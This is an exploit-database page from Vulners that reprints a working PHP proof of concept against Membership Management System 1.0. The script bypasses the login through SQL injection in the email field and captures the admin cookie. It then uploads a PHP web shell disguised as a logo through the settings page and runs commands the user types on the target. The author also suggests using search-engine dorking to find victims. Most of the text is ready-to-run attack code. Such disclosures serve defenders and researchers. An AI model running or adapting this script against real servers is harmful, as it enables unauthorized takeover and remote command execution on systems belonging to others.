Vulners
Lucene search
Membership Management System 1.0 Code Injection
`=============================================================================================================================================
| # Title : Membership Management System version 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This payload inject php code contains a back door.
[+] Line 20 Set your Target.
[+] save payload as poc.php
[+] usage from cmd : C:\www\test>php 1.php
[+] payload :
<?php
// Function to generate a random string of a given length
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {
return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);
}
// Generating a random web shell file
$shellFile = randomGen() . ".php";
// Creating a payload for the login
$payload = [
'email' => "[email protected]' or 0=0 #", // Adjust based on the target
'password' => 'a',
'login' => ''
];
$session = curl_init();
// Target base URL (change this to your target IP or domain)
$urlBase = "http://127.0.0.1/Membership/";
// Login
$url = $urlBase . "index.php";
echo "=== Executing SQL Injection ===\n";
// Set cURL options for the POST request
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_HEADER, true); // Include header in output
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging
// Execute the login request
$response = curl_exec($session);
// Separate headers from body
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
// Check if 'Set-Cookie' header is present in the headers
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);
$cookie = '';
if (isset($matches[1][0])) {
$cookie = $matches[1][0];
}
// Print headers for debugging
echo "=== Response Headers ===\n";
echo $headers;
if ($cookie) {
echo "=== Authenticated admin cookie: " . $cookie . " ===\n";
} else {
echo "Set-Cookie header not found in the response.\n";
exit();
}
// Prepare to upload shell
$url = $urlBase . "settings.php";
// Get user input for the command to execute
echo "Enter the command to execute: ";
$cmd_input = trim(fgets(STDIN));
// PHP code to execute the command received from the user
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";
// Prepare the multipart/form-data
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$body = "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";
$body .= "Membership System\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";
$body .= "$\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";
$body .= $php_code . "\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";
$body .= "\r\n";
$body .= "--$boundary--\r\n";
// Set cURL options for file upload
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, $body);
curl_setopt($session, CURLOPT_HTTPHEADER, [
'Content-Type: multipart/form-data; boundary=' . $boundary,
'Cookie: ' . $cookie
]);
echo "=== Logging in and uploading shell " . $shellFile . " ===\n";
// Execute the upload request
$response = curl_exec($session);
// Close cURL session
curl_close($session);
// Curl the shell for testing
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);
echo "=== Issuing the command: " . $requestUrl . " ===\n";
echo "=== CURL OUTPUT ===\n";
echo file_get_contents($requestUrl);
?>
[+]
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4